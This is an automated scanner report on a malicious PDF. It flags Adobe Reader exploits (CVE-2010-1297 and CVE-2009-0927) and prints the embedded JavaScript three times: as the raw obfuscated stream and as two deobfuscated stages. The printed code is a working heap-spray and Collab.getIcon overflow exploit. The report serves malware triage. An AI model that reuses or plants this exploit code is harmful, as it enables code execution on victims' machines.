MALICIOUS
Risk Score: 336
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9
- Adobe Flash authplay SWF exploit in PDF — CVE-2010-1297 | critical | CVE likely | CVE_2010_1297_FLASH_RICHMEDIA
  PDF combines RichMedia Flash activation, a crafted SWF with ActionScript prototype/AVM-era markers or the AES-PHP/authplay variant markers, and PDF-side shellcode heap-spray staging. This is the static delivery shape associated with CVE-2010-1297 in Adobe Reader's bundled authplay.dll.
- Collab.getIcon — CVE-2009-0927 | critical | CVE exact | CVE_2009_0927
  PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- RichMedia (Flash) | high | PDF_RICHMEDIA
  PDF contains /RichMedia (Adobe Flash), which is a historic exploit vector.
- Generic recovered JavaScript exploit stage | high | PDF_GENERIC_STAGE_RECOVERY
  Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact | medium | EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- JavaScript action | low | 1 related finding | PDF_JAVASCRIPT
  PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream | low | PDF_JS
  PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded file | low | PDF_EMBEDDED
  PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
- Embedded URL | info | EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
  - http://ns.adobe.com/pdfx/1.3/ (in PDF document text)
Extracted artifacts 4
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| 8.swf | pdf-embedded-file | PDF EmbeddedFile object 37 at offset 0x2E1C5 | 2557 bytes |

SHA-256: 2aa862d005f88538e38f0035e72490ff3991361b263b95d6130145c16f6a7c8d
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (actual_type=SWF; declared_or_context_type=PDF; filename=8.swf; kind=pdf-embedded-file)

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0027_000.js | pdf-javascript-stream | PDF /JS object 27 at offset 0x2D216 | 11097 bytes |

SHA-256: 75149c3be001060cb4f62ee28c5ec686553abb57c6d1b441ea2c8cc391e14486

Preview script: first 1,000 lines of the extracted script
var sc;//ahlfah
for(i=0;i<18000;i++)
sc = sc+0x70;
var h1="\x62\x79\x74\x65\x54\x6f\x43\x68\x61\x72";
var unun=unescape;
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret='';
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret =ret+util[h1](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
function exp() {
//aslf['asgk'g;
blah = rep(128, unun("%\x750\x43\x30C\x25u\x30\x430\x43%\x750\x43\x30C\x25u\x30\x430\x43%\x750\x43\x30C\x25u\x30\x430\x43")) + sc;
bbk = unun("%\x750\x43\x30C\x25u\x30\x430\x43");
wap = blah["\x6ce\x6e\x67\x74h"]+36
while (bbk["l\x65n\x67t\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["\x6ce\x6e\x67\x74h"]-wap);
while(bk["\x6ce\x6e\x67\x74h"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//hdofhajljf2[
for (i=0;i<400;i++) mm[i] = bk + blah;
}
function exp8() {
blah = rep(128, unun("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unun("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
if(app.viewerVersion>=9.40)
{
var LbWxSqgNmAwjUaoXaywhlH = unescape
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH("\x25"+ "\x75" + "0" + "C" + "0" + "C" + "\x25u" + "0" + "C" + "0" + "C");
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<496;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else if(app.viewerVersion>=9.00)
{
exp();
}
else
{
exp8();
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 27 at offset 0x2D216 | 9739 bytes |

SHA-256: 389ccbd3eedbbf861e4db0568a3a160c2989a49b3fef6bcab40a6186ea5c83b6
Detection
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: likely. 13 of 21 identifiers look randomly generated (e.g. 'KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoN') — consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
var sc;//ahlfah
for(i=0;i<18000;i++)
sc = sc+0x70;
var h1="\x62\x79\x74\x65\x54\x6f\x43\x68\x61\x72";
var unun=unescape;
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret='';
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret =ret+util[h1](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
function exp() {
//aslf['asgk'g;
blah = rep(128, unun("%\x750\x43\x30C\x25u\x30\x430\x43%\x750\x43\x30C\x25u\x30\x430\x43%\x750\x43\x30C\x25u\x30\x430\x43")) + sc;
bbk = unun("%\x750\x43\x30C\x25u\x30\x430\x43");
wap = blah["\x6ce\x6e\x67\x74h"]+36
while (bbk["l\x65n\x67t\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["\x6ce\x6e\x67\x74h"]-wap);
while(bk["\x6ce\x6e\x67\x74h"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//hdofhajljf2[
for (i=0;i<400;i++) mm[i] = bk + blah;
}
function exp8() {
blah = rep(128, unun("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unun("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
if(app.viewerVersion>=9.40)
{
var LbWxSqgNmAwjUaoXaywhlH = unescape
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH("%u0C0C%u0C0C");
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<496;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else if(app.viewerVersion>=9.00)
{
exp();
}
else
{
exp8();
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| js_property_alias_stage_000.js | deobfuscated-js | JavaScript property alias normalized stage at offset 0x2D216 | 10025 bytes |

SHA-256: 80243d0f780cc38bd4c31aec2d93374c330b47b98e126bc96ad4e3fd6e13b0c5
Detection
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).

Preview script: first 1,000 lines of the extracted script
var sc;//ahlfah
for(i=0;i<18000;i++)
sc = sc+0x70;
var h1="byteToChar";
var unun=unescape;
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret='';
for (var x=0;x < buf["length"]; x+=2) {
ret =ret+util[h1](Number('0x'+buf["substr"](x,2)));//
}
return ret;
}
function exp() {
//aslf['asgk'g;
blah = rep(128, unun("%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C")) + sc;
bbk = unun("%u0C0C%u0C0C");
wap = blah["length"]+36
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//hdofhajljf2[
for (i=0;i<400;i++) mm[i] = bk + blah;
}
function exp8() {
blah = rep(128, unun("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unun("%u4242%u4242");
var h="getIcon";
wap = 0x24+blah["length"]
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("0a0a0a0a"));
var a=["_N.bundle"];//next time
var b=5;//shlshgl
Collab.getIcon(of+a[b-b])//ajf[pa';[
}
if(app.viewerVersion>=9.40)
{
var LbWxSqgNmAwjUaoXaywhlH = unescape
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH("%"+ "u" + "0" + "C" + "0" + "C" + "%u" + "0" + "C" + "0" + "C");
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["length"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["substring"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["substring"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["length"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["substring"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<496;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else if(app.viewerVersion>=9.00)
{
exp();
}
else
{
exp8();
}
/* static-property-alias-sinks */
unescape('%u9090%u9090');Collab.getIcon(